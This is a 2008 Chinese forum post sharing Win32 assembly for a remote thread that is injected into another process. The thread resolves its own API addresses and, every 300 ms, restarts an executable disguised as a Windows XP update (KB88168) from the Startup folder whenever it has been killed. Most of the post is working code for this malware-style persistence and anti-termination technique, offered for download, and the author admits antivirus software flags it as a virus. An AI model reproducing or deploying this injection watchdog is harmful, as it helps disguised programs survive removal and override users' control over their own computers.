用远线程保护进程(win32汇编)
*/ --------------------------------------------------------------------------------------*/ 出自: 编程中国 https://www.bccn.net
*/ 作者: zklhp E-mail:zklhp@ QQ:493165744
*/ 时间: 2008-11-29 编程论坛首发
*/ 声明: 尊重作者劳动,转载请保留本段文字
*/ --------------------------------------------------------------------------------------
接着上次的那个 接着写个保护的 没什么新意 就是总结一下吧
帖一下远线程的代码吧
程序代码:
.code
Remote_code_start equ this BYTE
g_lpGetModuleHandleA dd 0
g_lpGetProcAddress dd 0
g_szKernel32 db 'Kernel32.dll',0
g_hKernel32 dd 0
g_szCreateProcessA db 'CreateProcessA',0
g_lpCreateProcessA dd 0
g_szCreateToolhelp32Snapshot db 'CreateToolhelp32Snapshot',0
g_lpCreateToolhelp32Snapshot dd 0
g_szProcess32First db 'Process32First',0
g_lpProcess32First dd 0
g_szProcess32Next db 'Process32Next',0
g_lpProcess32Next dd 0
g_szlstrcmpiA db 'lstrcmpiA',0
g_lplstrcmpiA dd 0
g_szCloseHandle db 'CloseHandle',0
g_lpCloseHandle dd 0
g_szSleep db 'Sleep',0
g_lpSleep dd 0
g_szProcessName db 'WindowsXP-KB88168-x86-CHS.exe',0
g_szPath db 'C:\Documents and Settings\All Users\「开始」菜单\程序\启动\WindowsXP-KB88168-x86-CHS.exe',0 ;配合前面那个程序~~~
g_szDesktop db 'WinSta0\Default',0
g_stProcess PROCESSENTRY32 <0>
g_hSnapshot dd 0
g_dwProcessID dd 0
g_stStartupInfo STARTUPINFO <0>
g_ProcInfo PROCESS_INFORMATION <0>
_RemoteThread proc
pushad
call delta
delta:
pop ebx ;得到当前地址 这里没有再减 学习cih的重定位方法 貌似这样省字节
lea eax, [ebx+(g_szKernel32-delta)]
_invoke [ebx+(g_lpGetModuleHandleA-delta)], eax
mov [ebx+(g_hKernel32-delta)],eax
mov esi,eax
lea eax, [ebx+(g_szKernel32-delta)]
_invoke [ebx+(g_lpGetModuleHandleA-delta)], eax
mov esi, eax
;要用的api都得查出地址 现在是在人家的地盘啊
lea eax, [ebx+(g_szCreateProcessA-delta)]
_invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
mov [ebx+(g_lpCreateProcessA-delta)], eax
lea eax, [ebx+(g_szCreateToolhelp32Snapshot-delta)]
_invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
mov [ebx+(g_lpCreateToolhelp32Snapshot-delta)], eax
lea eax, [ebx+(g_szProcess32First-delta)]
_invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
mov [ebx+(g_lpProcess32First-delta)], eax
lea eax, [ebx+(g_szProcess32Next-delta)]
_invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
mov [ebx+(g_lpProcess32Next-delta)], eax
lea eax, [ebx+(g_szlstrcmpiA-delta)]
_invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
mov [ebx+(g_lplstrcmpiA-delta)], eax
lea eax, [ebx+(g_szCloseHandle-delta)]
_invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
mov [ebx+(g_lpCloseHandle-delta)], eax
lea eax, [ebx+(g_szSleep-delta)]
_invoke [ebx+(g_lpGetProcAddress-delta)], esi, eax
mov [ebx+(g_lpSleep-delta)], eax
@loop:
lea esi,[ebx+(g_stProcess-delta)]
assume esi:ptr PROCESSENTRY32
mov [esi].dwSize,sizeof g_stProcess
assume esi:nothing
_invoke [ebx+(g_lpCreateToolhelp32Snapshot-delta)], TH32CS_SNAPPROCESS, 0
mov edi, eax ;edi = hSnapshot
lea ecx,[ebx+(g_stProcess-delta)]
_invoke [ebx+(g_lpProcess32First-delta)], edi,ecx
.while eax
lea ecx,[ebx+(g_stProcess-delta)]
assume esi:ptr PROCESSENTRY32
lea edx,[esi].szExeFile
assume esi:nothing
lea ecx,[ebx+(g_szProcessName-delta)]
_invoke [ebx+(g_lplstrcmpiA-delta)], ecx, edx
.if eax==0
mov esi,TRUE ;设置找到的标志
.break
.endif
lea ecx,[ebx+(g_stProcess-delta)]
_invoke [ebx+(g_lpProcess32Next-delta)], edi, ecx
.endw
_invoke [ebx+(g_lpCloseHandle-delta)], edi
.if esi!=TRUE ;没有就运行
lea eax, [ebx+(g_szDesktop-delta)]
lea ecx, [ebx+(g_stStartupInfo-delta)]
mov DWORD ptr [ecx], sizeof g_stStartupInfo
mov DWORD ptr [ecx+8], eax
lea eax, [ebx+(g_szPath-delta)]
lea edx, [ebx+(g_ProcInfo-delta)]
_invoke [ebx+(g_lpCreateProcessA-delta)], 0, eax, 0, 0, 0, 0, 0, 0, ecx, edx
.endif
_invoke [ebx+(g_lpSleep-delta)],300d ;刚杀掉有有了 呵呵 这里可以改的合适一点 间隔太小也不好
jmp @loop
popad
ret
_RemoteThread endp
Remote_code_end equ this BYTE
Remote_code_length equ offset Remote_code_end - offset Remote_code_start
;注入代码的长度
在偶的2003下运行没问题
这个会被杀毒软件认为是病毒~~~~ 因使用造成的后果与我无关啊
还是那句话 别干坏事啊
参考了罗云彬的程序 向前辈的无私奉献精神表示感谢
程序+代码
RemoteThreadProtect.rar
(7.31 KB)
这个是被保护的进程 就是那个弹窗口的程序(前几天静老大审核时没笑翻吧) 做了点改动
MessageBox.rar
(6.46 KB)
[[it] 本帖最后由 zklhp 于 2008-12-5 19:29 编辑 [/it]]
